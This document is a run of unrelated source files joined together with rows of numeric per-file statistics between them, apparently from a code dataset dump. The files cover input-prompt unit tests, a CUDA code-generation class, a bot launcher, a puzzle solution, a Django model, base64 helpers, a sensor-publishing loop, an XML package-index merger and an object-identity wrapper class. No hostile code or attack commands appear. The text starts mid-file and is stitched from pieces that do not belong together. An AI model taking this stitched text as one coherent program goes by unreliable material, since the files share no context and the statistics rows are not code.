with mock.patch(self._get_pathable_input(), return_value='e8n0dpankpdvdni3kgac'):
value = input.text(description2)
self.assert_in(description2, self.stdout.getvalue())
self.assert_equal('e8n0dpankpdvdni3kgac', value)
def test_default_empty(self):
"""
Test default empty input
:return: void
"""
input = Input()
with mock.patch(self._get_pathable_input(), return_value=''):
value = input('')
self.assert_is_none(value)
def test_integer(self):
"""
Test integer input
:return: void
"""
description = self.rand_str()
input = Input()
with mock.patch(self._get_pathable_input(), return_value='4815162342'):
value = input.integer(description)
self.assert_in(description, self.stdout.getvalue())
self.assert_equal(4815162342, value)
def test_integer_invalid(self):
"""
Test integer invalid input
:return: void
"""
input = Input()
with mock.patch(self._get_pathable_input(), return_value='Ygritte dies'):
value = input.integer('')
self.assert_is_none(value)
def test_float(self):
"""
Test float input
:return: void
"""
description = self.rand_str()
input = Input()
with mock.patch(self._get_pathable_input(), return_value='4.2'):
value = input.float(description)
self.assert_in(description, self.stdout.getvalue())
self.assert_equal(4.2, value)
def test_float_invalid(self):
"""
Test float invalid input
:return: void
"""
input = Input()
with mock.patch(self._get_pathable_input(), return_value='Peanut butter jelly time'):
value = input.float('')
self.assert_is_none(value)
def test_yes_no(self):
"""
Test yes_no input
:return: void
"""
description = self.rand_str()
input = Input()
with mock.patch(self._get_pathable_input(), return_value='y'):
value = input.yes_no(description)
self.assert_in(description, self.stdout.getvalue())
self.assert_true(value)
def test_yes_no_no(self):
"""
Test yes_no no input
:return: void
"""
input = Input()
with mock.patch(self._get_pathable_input(), return_value='n'):
value = input.yes_no('')
self.assert_false(value)
def test_yes_no_invalid(self):
"""
Test yes_no invalid input
:return: void
"""
input = Input()
with mock.patch(self._get_pathable_input(), return_value='Indiana Jones dies in Star Wars'):
value = input.yes_no('')
self.assert_false(value)
def test_pick(self):
"""
Test pick input
:return: void
"""
description = self.rand_str()
options = [
'May the',
'odds ever',
'be in your',
'favour'
]
input = Input()
with mock.patch(self._get_pathable_input(), return_value='2'):
value = input.pick(options, description)
self.assert_in(description, self.stdout.getvalue())
self.assert_equal(2, value)
def test_pick_out_of_range(self):
"""
Test pick out of range input
:return: void
"""
description = self.rand_str()
options = [
'May the',
'odds ever',
'be in your',
'favour'
]
input = Input()
with mock.patch(self._get_pathable_input(), return_value='6'):
value = input.pick(options, description)
self.assert_in(description, self.stdout.getvalue())
self.assert_is_none(value)
def test_pick_invalid(self):
"""
Test pick invalid input
:return: void
"""
description = self.rand_str()
options = [
'May the',
'odds ever',
'be in your',
'favour'
]
input = Input()
with mock.patch(self._get_pathable_input(), return_value='Scoobiedoobiedoo'):
value = input.pick(options, description)
self.assert_in(description, self.stdout.getvalue())
self.assert_is_none(value)
def _get_pathable_input(self):
"""
Get the patchable input
:return: Patchable input
"""
if sys.version_info < (3, 0):
return '__builtin__.raw_input'
else:
return 'builtins.input'
| 25.564593 | 100 | 0.561669 | 570 | 5,343 | 5.045614 | 0.14386 | 0.099444 | 0.077886 | 0.076843 | 0.735049 | 0.703408 | 0.703408 | 0.659944 | 0.631085 | 0.631085 | 0 | 0.012239 | 0.327157 | 5,343 | 208 | 101 | 25.6875 | 0.787761 | 0.097511 | 0 | 0.53271 | 0 | 0 | 0.07041 | 0.004754 | 0 | 0 | 0 | 0 | 0.196262 | 1 | 0.121495 | false | 0 | 0.037383 | 0 | 0.186916 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
56ee0f2b7c20549c27468c938496b4dd2926bdef | 1,803 | py | Python | gemmforge/vm/lexic/cuda_lexic.py | ravil-mobile/gemmforge | 6381584c2d1ce77eaa938de02bc4f130f19cb2e4 | [
"MIT"
] | null | null | null | gemmforge/vm/lexic/cuda_lexic.py | ravil-mobile/gemmforge | 6381584c2d1ce77eaa938de02bc4f130f19cb2e4 | [
"MIT"
] | 2 | 2021-02-01T16:31:22.000Z | 2021-05-05T13:44:43.000Z | gemmforge/vm/lexic/cuda_lexic.py | ravil-mobile/gemmforge | 6381584c2d1ce77eaa938de02bc4f130f19cb2e4 | [
"MIT"
] | null | null | null | from .lexic import Lexic
class CudaLexic(Lexic):
def __init__(self, underlying_hardware):
super().__init__(underlying_hardware)
self.thread_idx_y = "threadIdx.y"
self.thread_idx_x = "threadIdx.x"
self.thread_idx_z = "threadIdx.z"
self.block_idx_x = "blockIdx.x"
self.block_dim_y = "blockDim.y"
self.block_dim_z = "blockDim.z"
self.stream_name = "cudaStream_t"
def get_launch_code(self, func_name, grid, block, stream, func_params):
return "kernel_{}<<<{},{},0,{}>>>({})".format(func_name, grid, block, stream, func_params)
def declare_shared_memory_inline(self, name, precision, size, alignment):
return f"__shared__ __align__({alignment}) {precision} {name}[{size}]"
def kernel_definition(self, file, kernel_bounds, base_name, params, precision=None,
total_shared_mem_size=None):
return file.CudaKernel(base_name, params, kernel_bounds)
def sync_threads(self):
return "__syncthreads()"
def sync_vec_unit(self):
return "__syncwarp()"
def kernel_range_object(self):
return "dim3"
def get_stream_via_pointer(self, file, stream_name, pointer_name):
if_stream_exists = f'({pointer_name} != nullptr)'
stream_obj = f'static_cast<{self.stream_name}>({pointer_name})'
file(f'{self.stream_name} stream = {if_stream_exists} ? {stream_obj} : 0;')
def check_error(self):
return "CHECK_ERR"
def batch_indexer_gemm(self):
return self.get_tid_counter(self.thread_idx_y, self.block_dim_y, self.block_idx_x)
def batch_indexer_csa(self):
return self.get_tid_counter(self.thread_idx_z, self.block_dim_z, self.block_idx_x)
def batch_indexer_init(self):
return self.get_tid_counter(self.thread_idx_y, self.block_dim_y, self.block_idx_x)
def get_headers(self):
return []
| 33.388889 | 94 | 0.719357 | 261 | 1,803 | 4.555556 | 0.302682 | 0.068124 | 0.065601 | 0.043734 | 0.253154 | 0.240538 | 0.240538 | 0.151388 | 0.151388 | 0.117746 | 0 | 0.00197 | 0.155297 | 1,803 | 53 | 95 | 34.018868 | 0.778726 | 0 | 0 | 0.052632 | 0 | 0 | 0.191348 | 0.054354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.342105 | false | 0 | 0.026316 | 0.289474 | 0.684211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
56f802ddb06776d60b8cfd73fb56d6e4e6bc9fde | 115 | py | Python | run.py | KirtusJ/BirdBot | 4440364caefa6ec9acf1bc7cf38605b1d90de20e | [
"MIT"
] | null | null | null | run.py | KirtusJ/BirdBot | 4440364caefa6ec9acf1bc7cf38605b1d90de20e | [
"MIT"
] | null | null | null | run.py | KirtusJ/BirdBot | 4440364caefa6ec9acf1bc7cf38605b1d90de20e | [
"MIT"
] | null | null | null | from src import app
try:
app.bot.run(app.env['token'], bot=True, reconnect=True)
except Exception as e:
print(e) | 19.166667 | 56 | 0.721739 | 21 | 115 | 3.952381 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 115 | 6 | 57 | 19.166667 | 0.83 | 0 | 0 | 0 | 0 | 0 | 0.043103 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
56fc3e621ad547315451aaef15d494aaa7729aca | 543 | py | Python | 15.py | ednl/aoc2017 | 429cec4e8e89bed375bc40989d7c8bab609cc4b1 | [
"MIT"
] | null | null | null | 15.py | ednl/aoc2017 | 429cec4e8e89bed375bc40989d7c8bab609cc4b1 | [
"MIT"
] | null | null | null | 15.py | ednl/aoc2017 | 429cec4e8e89bed375bc40989d7c8bab609cc4b1 | [
"MIT"
] | null | null | null | def duel1(a, b, c):
k = 0
for _ in range(c):
a = a * 16807 % 2147483647
b = b * 48271 % 2147483647
k += a & 0xffff == b & 0xffff
return k
def duel2(a, b, c):
k = 0
for _ in range(c):
a = a * 16807 % 2147483647
while a & 0x3:
a = a * 16807 % 2147483647
b = b * 48271 % 2147483647
while b & 0x7:
b = b * 48271 % 2147483647
k += a & 0xffff == b & 0xffff
return k
print(duel1(783, 325, 40_000_000))
print(duel2(783, 325, 5_000_000))
| 23.608696 | 38 | 0.488029 | 80 | 543 | 3.2375 | 0.3125 | 0.023166 | 0.081081 | 0.196911 | 0.687259 | 0.687259 | 0.687259 | 0.687259 | 0.555985 | 0.555985 | 0 | 0.398176 | 0.394107 | 543 | 22 | 39 | 24.681818 | 0.389058 | 0 | 0 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055249 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
56fc6c4a86f3fdad8466b50419d8abe83ba31c2a | 244 | py | Python | todos/models.py | DastanArysbay/TodoAppProject | 2c23902dddaa2343a965a946e05dfa6d7f9174b3 | [
"MIT"
] | null | null | null | todos/models.py | DastanArysbay/TodoAppProject | 2c23902dddaa2343a965a946e05dfa6d7f9174b3 | [
"MIT"
] | null | null | null | todos/models.py | DastanArysbay/TodoAppProject | 2c23902dddaa2343a965a946e05dfa6d7f9174b3 | [
"MIT"
] | 1 | 2022-01-20T20:49:15.000Z | 2022-01-20T20:49:15.000Z | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Todo(models.Model):
# user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
content = models.TextField() | 40.666667 | 85 | 0.762295 | 35 | 244 | 5.285714 | 0.657143 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131148 | 244 | 6 | 86 | 40.666667 | 0.872642 | 0.42623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
711b77572e237349a6536ce5916b8d9b6a2f7e76 | 151 | py | Python | prac/20200526/wrap.py | yaroslavKonst/PythonPracticum | 2215b169252b6d429f1f38e5f2295d1435256785 | [
"Apache-2.0"
] | 2 | 2020-04-10T22:09:19.000Z | 2020-04-10T22:09:24.000Z | prac/20200526/wrap.py | yaroslavKonst/PythonPracticum | 2215b169252b6d429f1f38e5f2295d1435256785 | [
"Apache-2.0"
] | null | null | null | prac/20200526/wrap.py | yaroslavKonst/PythonPracticum | 2215b169252b6d429f1f38e5f2295d1435256785 | [
"Apache-2.0"
] | null | null | null | import sys
import subprocess
ex = sys.executable
print(subprocess.run([ex, sys.argv[1], *sys.argv[2:]], capture_output=True).stdout.decode("UTF-8"))
| 21.571429 | 99 | 0.728477 | 24 | 151 | 4.541667 | 0.708333 | 0.091743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.086093 | 151 | 6 | 100 | 25.166667 | 0.768116 | 0 | 0 | 0 | 0 | 0 | 0.033113 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
71202e3a141442b569da6b6d00f74b92142a8ac2 | 522 | py | Python | python/helpers.py | DuckLov3r/sovrin-whs | 3f2c9e6749834e1abde26d3acc8ce9312564534a | [
"Apache-2.0"
] | 1 | 2018-10-22T19:43:16.000Z | 2018-10-22T19:43:16.000Z | python/helpers.py | DuckLov3r/sovrin-whs | 3f2c9e6749834e1abde26d3acc8ce9312564534a | [
"Apache-2.0"
] | 2 | 2020-07-17T03:35:07.000Z | 2021-05-08T23:22:31.000Z | python/helpers.py | DuckLov3r/sovrin-whs | 3f2c9e6749834e1abde26d3acc8ce9312564534a | [
"Apache-2.0"
] | 2 | 2019-05-30T06:56:20.000Z | 2019-11-05T16:39:59.000Z | import base64
def serialize_bytes_json(data: bytes) -> str:
data_b64_encoded = base64.b64encode(data)
data_b64_encoded_str = data_b64_encoded.decode('utf-8')
return data_b64_encoded_str
def deserialize_bytes_json(b64_encoded: bytes) -> str:
b64_decoded = base64.b64decode(b64_encoded)
b64_decoded_str = b64_decoded.encode('utf-8')
return b64_decoded_str
def str_to_bytes(data: str) -> bytes:
return str.encode(data)
def bytes_to_str(data: bytes) -> str:
return data.decode('utf-8')
| 23.727273 | 59 | 0.737548 | 79 | 522 | 4.544304 | 0.253165 | 0.167131 | 0.155989 | 0.094708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 0.157088 | 522 | 21 | 60 | 24.857143 | 0.740909 | 0 | 0 | 0 | 0 | 0 | 0.028736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.307692 | false | 0 | 0.076923 | 0.153846 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
852fb825fe263ec82f820da72ee2a339cf8935c0 | 1,036 | py | Python | main.py | RandomReaper/cloudio-endpoint-python-example | ec8aa8f4e745072e67ef5fdee1a3d3910848a237 | [
"Apache-2.0"
] | null | null | null | main.py | RandomReaper/cloudio-endpoint-python-example | ec8aa8f4e745072e67ef5fdee1a3d3910848a237 | [
"Apache-2.0"
] | null | null | null | main.py | RandomReaper/cloudio-endpoint-python-example | ec8aa8f4e745072e67ef5fdee1a3d3910848a237 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from client import Sample_Client
import time
import random
# Create client
client = Sample_Client('sample.cfg')
time.sleep(5)
# Simple exemple
while(True):
print('Sending updates')
client.publish('Sensor1', 'L1_Volts', random.uniform(207,253))
client.publish('Sensor1', 'L2_Volts', random.uniform(207,253))
client.publish('Sensor1', 'L3_Volts', random.uniform(207,253))
client.publish('Sensor1', 'L1_Amps', random.uniform(1,2))
client.publish('Sensor1', 'L2_Amps', random.uniform(1,2))
client.publish('Sensor1', 'L3_Amps', random.uniform(1,2))
client.publish('Sensor2', 'L1_Volts', random.uniform(207,253))
client.publish('Sensor2', 'L2_Volts', random.uniform(207,253))
client.publish('Sensor2', 'L3_Volts', random.uniform(207,253))
client.publish('Sensor2', 'L1_Amps', random.uniform(1,2)/2)
client.publish('Sensor2', 'L2_Amps', random.uniform(1,2)/2)
client.publish('Sensor2', 'L3_Amps', random.uniform(1,2)/2)
time.sleep(60)
| 33.419355 | 66 | 0.690154 | 147 | 1,036 | 4.768707 | 0.258503 | 0.222539 | 0.171184 | 0.179743 | 0.710414 | 0.710414 | 0.664765 | 0.619116 | 0.114123 | 0 | 0 | 0.086909 | 0.122587 | 1,036 | 30 | 67 | 34.533333 | 0.684268 | 0.068533 | 0 | 0 | 0 | 0 | 0.207076 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15 | 0 | 0.15 | 0.05 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8547d29f5b4d30e3e1f440fdaabe2db21e5b21af | 8,070 | py | Python | 60-Publish/combine_packages_xml.py | marble/Toolchain_RenderDocumentation | 1b206c0478b7418a628233e9e1fd36eeb4224185 | [
"MIT"
] | null | null | null | 60-Publish/combine_packages_xml.py | marble/Toolchain_RenderDocumentation | 1b206c0478b7418a628233e9e1fd36eeb4224185 | [
"MIT"
] | 9 | 2016-09-05T19:24:57.000Z | 2018-12-05T16:11:55.000Z | 60-Publish/combine_packages_xml.py | marble/Toolchain_RenderDocumentation | 1b206c0478b7418a628233e9e1fd36eeb4224185 | [
"MIT"
] | 2 | 2017-04-08T10:12:48.000Z | 2020-08-14T13:10:42.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""Integrate two files known as 'packages.xml'.
Usage:
python combine_packages_xml.py FPATH_1 FPATH_2 >result.xml
Description:
The script reads FPATH_1 and updates the data with FPATH_2.
Entries are sorted by 'version+language'. The file timestamp
is set to 'now'. The result is printed to stdout.
"""
from __future__ import print_function
from __future__ import absolute_import
import codecs
import datetime
import re
import sys
import time
if not __name__ == "__main__":
print('Please run as main.')
sys.exit(1)
def usage(exitcode=0):
print(__doc__)
sys.exit(exitcode)
def usage1(exitcode=1):
lines = __doc__.split('\n')
print('\n'.join(lines[2:4] + [' Try --help']))
sys.exit(exitcode)
if len(sys.argv) == 1 or '--help' in sys.argv:
usage()
if len(sys.argv) != 3:
usage1()
fpath1 = sys.argv[1]
fpath2 = sys.argv[2]
unixtime = int(time.time())
dt = datetime.datetime.fromtimestamp(unixtime)
datetimestr = dt.strftime('%Y-%m-%d %H:%M:%S')
example_data = """
<?xml version="1.0" standalone="yes" ?>
<documentationPackIndex>
<meta>
<timestamp>1493982096</timestamp>
<date>2017-05-05 13:01:36</date>
</meta>
<languagePackIndex>
<languagepack version="0.4.0" language="default">
<md5>7c5890efa98d8184f2004a5d219bb57b</md5>
</languagepack>
<languagepack version="0.5.0" language="default">
<md5>cad89b3359498d070e75247b9e974eb2</md5>
</languagepack>
<languagepack version="0.6.0" language="default">
<md5>fd8f805fef1bdf748de32e430ccd08d6</md5>
</languagepack>
<languagepack version="1.0.0" language="default">
<md5>c98885a6a82329c48d35ba1be06c62c2</md5>
</languagepack>
<languagepack version="1.1.0" language="default">
<md5>8a20f8337c2dd3cadeeab46544826177</md5>
</languagepack>
<languagepack version="1.1.0" language="fr_FR">
<md5>2725397412083343c57bad8a706257cf</md5>
</languagepack>
<languagepack version="1.1.1" language="default">
<md5>567f4fa8883766acf58ad529bd28f165</md5>
</languagepack>
<languagepack version="1.1.1" language="fr_FR">
<md5>20fd95af62d5bee7bab4b20e20752923</md5>
</languagepack>
<languagepack version="1.2.0" language="default">
<md5>d82077b4e25ebd4d3ff2d6568006310c</md5>
</languagepack>
<languagepack version="1.2.0" language="fr_FR">
<md5>a2fecd2e4a43e7103dca6a7800990519</md5>
</languagepack>
<languagepack version="1.2.1" language="default">
<md5>9c0d59e8ca0224417f4cc50d1137b989</md5>
</languagepack>
<languagepack version="1.2.1" language="fr_FR">
<md5>7b64db2f3632f15639c5c1b0b6853962</md5>
</languagepack>
<languagepack version="1.2.2" language="default">
<md5>5b269fc51aab30596267e40f65494ab3</md5>
</languagepack>
<languagepack version="1.2.2" language="fr_FR">
<md5>12cc312274ccc74836218a4a1c4fe367</md5>
</languagepack>
<languagepack version="1.3.0" language="default">
<md5>1b9ff0511b50f89220efa4dae402d7f2</md5>
</languagepack>
<languagepack version="1.3.0" language="fr_FR">
<md5>6ce32d8a414aaeabfa706483e7799b46</md5>
</languagepack>
<languagepack version="1.3.1" language="default">
<md5>13079fb01792655184bf71650938b308</md5>
</languagepack>
<languagepack version="1.3.1" language="fr_FR">
<md5>4edf4b024b394135152bd204bfaff2f5</md5>
</languagepack>
<languagepack version="1.3.2" language="default">
<md5>c6338fb4fc2e5178184cf6ad65eefcfe</md5>
</languagepack>
<languagepack version="1.3.2" language="fr_FR">
<md5>6a8ed5d22a808487a8217844f5b0c500</md5>
</languagepack>
<languagepack version="2.0.0" language="default">
<md5>1d079e747c8b2f4c0b589712c13427be</md5>
</languagepack>
<languagepack version="2.0.0" language="fr_FR">
<md5>c3cf49cfdc8a0e29d10832a4344e91e7</md5>
</languagepack>
<languagepack version="2.0.1" language="default">
<md5>76abdd02fa068e8074815b36d8e460d3</md5>
</languagepack>
<languagepack version="2.0.1" language="fr_FR">
<md5>4bf4dcda2a6e74d34479503543137ad5</md5>
</languagepack>
<languagepack version="2.1.0" language="default">
<md5>f08a233da48eacb10c47922805afd249</md5>
</languagepack>
<languagepack version="2.1.0" language="fr_FR">
<md5>6584398fcc9e7f5a546722da5a103d26</md5>
</languagepack>
<languagepack version="2.2.0" language="default">
<md5>b982d16982626a60d0afd175a42b8938</md5>
</languagepack>
<languagepack version="2.2.0" language="fr_FR">
<md5>7333f623ee0452401d653818c1e5a8de</md5>
</languagepack>
<languagepack version="2.2.1" language="default">
<md5>15c025915b4106418dabdb19ef67d24b</md5>
</languagepack>
<languagepack version="2.2.1" language="fr_FR">
<md5>d4160de05bde35f2217558b57adba429</md5>
</languagepack>
<languagepack version="2.2.2" language="default">
<md5>9af5abd5ebf7278bcc456ccc1cc23b63</md5>
</languagepack>
<languagepack version="2.2.2" language="fr_FR">
<md5>3609e8f2052ff03d27eabfd52991b9f8</md5>
</languagepack>
<languagepack version="2.2.3" language="default">
<md5>fe6d78a9e3deed8ff43f9424dd3272f7</md5>
</languagepack>
<languagepack version="2.2.3" language="fr_FR">
<md5>f39b898bf9efedfbbf8b670e7ce7bb88</md5>
</languagepack>
<languagepack version="2.3.0" language="default">
<md5>d4f85ecaf4f6a0c83cfcf5e68dcd7a0f</md5>
</languagepack>
<languagepack version="2.3.0" language="fr_FR">
<md5>37428948f560597acf8ed45fdfb3da98</md5>
</languagepack>
<languagepack version="2.3.1" language="default">
<md5>152b3e2f0645fd2e8c9c08fcc2e8862b</md5>
</languagepack>
<languagepack version="2.3.1" language="fr_FR">
<md5>c36846d36aea5225e54260892eccc24b</md5>
</languagepack>
<languagepack version="2.4.0" language="default">
<md5>e7db74af568ddc646ee6e7388dbbe110</md5>
</languagepack>
<languagepack version="2.4.0" language="fr_FR">
<md5>55dab560775a957acb32f3edb23d439a</md5>
</languagepack>
<languagepack version="2.5.0" language="default">
<md5>2d8aedc81bca14a3077a474299b64af6</md5>
</languagepack>
<languagepack version="2.5.0" language="fr_FR">
<md5>ebdcb836634fb3c0cb57d8b4d1c745da</md5>
</languagepack>
<languagepack version="2.5.1" language="default">
<md5>26ae6128e32b5e5567b4fb52f8b5a2d2</md5>
</languagepack>
<languagepack version="2.5.1" language="fr_FR">
<md5>c371f7323107d00de9c9172e5a51f05a</md5>
</languagepack>
</languagePackIndex>
</documentationPackIndex>
"""
prolog_template = """\
<?xml version="1.0" standalone="yes" ?>
<documentationPackIndex>
<meta>
<timestamp>%(unixtime)s</timestamp>
<date>%(datetimestr)s</date>
</meta>
<languagePackIndex>"""
languagepack = """\
<languagepack version="%(version)s" language="%(language)s">
<md5>%(md5)s</md5>
</languagepack>"""
epilog = """\
</languagePackIndex>
</documentationPackIndex>"""
re_obj = re.compile('''
<languagepack
\\s+
version="(?P<version>\d+\.\d+\.\d+)"
\\s+
language="(?P<language>[a-zA-Z-_]*)"\\s*.
\\s*<md5>(?P<md5>[a-f0-9]*)</md5>
''', re.VERBOSE + re.DOTALL)
def version_tuple(v):
return tuple([int(part) for part in v.split('.') if part.isdigit()])
def version_cmp(a, b):
return cmp(version_tuple(a), version_tuple(b))
def getversions(fpath):
result = {}
with codecs.open(fpath, 'r', 'utf-8') as f1:
data = f1.read()
for m in re_obj.finditer(data):
k = '%s,%s' % (m.group('version'), m.group('language'))
result[k] = {
'version': m.group('version'),
'language': m.group('language'),
'md5': m.group('md5')
}
return result
def version_cmp(a, b):
result = cmp(version_tuple(a[1]['version']), version_tuple(b[1]['version']))
if result == 0:
result = cmp(a[1]['language'], b[1]['language'])
return result
versions1 = getversions(fpath1)
versions2 = getversions(fpath2)
versions3 = versions1.copy()
versions3.update(versions2)
print(prolog_template % {'unixtime': unixtime, 'datetimestr': datetimestr})
for k, v in sorted(list(versions3.items()), cmp=version_cmp):
print(languagepack % v)
print(epilog)
| 31.647059 | 80 | 0.705204 | 900 | 8,070 | 6.25 | 0.211111 | 0.152 | 0.242489 | 0.259911 | 0.426311 | 0.356267 | 0.341333 | 0.341333 | 0.021333 | 0 | 0 | 0.16707 | 0.128501 | 8,070 | 254 | 81 | 31.771654 | 0.632731 | 0.044114 | 0 | 0.280543 | 0 | 0 | 0.777706 | 0.290812 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027149 | false | 0 | 0.031674 | 0.00905 | 0.076923 | 0.031674 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8586f20d81d871dcccdebbc919a4ef229a83d7c5 | 978 | py | Python | ai2business/datasets/sample_generator.py | SimonBOai/ai2business | 68b5e63841e2636310095184b453fe6450baf372 | [
"Apache-2.0"
] | null | null | null | ai2business/datasets/sample_generator.py | SimonBOai/ai2business | 68b5e63841e2636310095184b453fe6450baf372 | [
"Apache-2.0"
] | 24 | 2020-12-03T07:47:42.000Z | 2020-12-19T16:38:01.000Z | ai2business/datasets/sample_generator.py | Anselmoo/ai2business | 98af02afe5317e6a6271528e062f00118396645f | [
"Apache-2.0"
] | null | null | null | """Generates sample list of KPIs"""
from ai2business.datasets.data import database
class SampleGenerators:
"""Sample Generators allows to generate key word list.
!!! example
The module `sample_generator.py` contains functions, which allows generating a list of
keywords with and without acronym.
```python
# Get ticker values of the leading stock markert worldwide.
stock_market(indices: str = "DOWJONES") -> dict
```
"""
pass
def stock_market(indices: str = "DOWJONES") -> dict:
"""Returns all company names and ISIN for a given stock market.
Args:
indices (str, optional): Name of the stock market. Defaults to "DOWJONES".
Returns:
dict: Collection of the indices of the current stock market.
"""
try:
return database.StockMarket.__dict__[indices.lower()]
except KeyError as exc:
print(f"ERROR: {exc} -> Indices is not listed in the database!")
return {}
| 27.942857 | 94 | 0.664622 | 121 | 978 | 5.31405 | 0.636364 | 0.085537 | 0.055988 | 0.065319 | 0.102644 | 0.102644 | 0 | 0 | 0 | 0 | 0 | 0.001353 | 0.244376 | 978 | 34 | 95 | 28.764706 | 0.868742 | 0.5818 | 0 | 0 | 1 | 0 | 0.182891 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.111111 | 0 | 0.555556 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
85898d0127c4615b70c92c5404cf93317797aa04 | 1,353 | py | Python | identityholder.py | BenNordick/HiLoop | 07d20ce872b2d50c3dbd5d34f05d99f7e0c49a2e | [
"MIT"
] | 1 | 2021-07-30T02:42:35.000Z | 2021-07-30T02:42:35.000Z | identityholder.py | BenNordick/HiLoop | 07d20ce872b2d50c3dbd5d34f05d99f7e0c49a2e | [
"MIT"
] | null | null | null | identityholder.py | BenNordick/HiLoop | 07d20ce872b2d50c3dbd5d34f05d99f7e0c49a2e | [
"MIT"
] | 1 | 2022-01-26T11:45:52.000Z | 2022-01-26T11:45:52.000Z | class IdentityHolder:
"""
Wraps an object so that it can be quickly compared by object identity rather than value.
Also provides a total order based on object address.
This is frequently useful for sets representing cycles: set value equality is O(n) but object identity equality is O(1).
Different cycles can have the same nodes in a different order; it is important to distinguish these objects, but useful
to represent them as sets for purposes of fast intersection.
"""
def __init__(self, value, tag=None):
"""Wrap a value, optionally tagged with extra information."""
self.value = value
self.tag = tag
def __hash__(self):
return id(self.value)
def __eq__(self, other):
return self.value is other.value
def __str__(self):
return 'IH`' + str(self.value) + '`'
def __repr__(self):
return 'IdentityHolder(' + repr(self.value) + ', ' + repr(self.tag) + ')'
def order(self, other):
"""Return a tuple of this holder and the other such that the first item is before the second in a total order."""
return (self, other) if self.isbefore(other) else (other, self)
def isbefore(self, other):
"""Determine whether this holder is before the other in a total order."""
return id(self.value) < id(other.value)
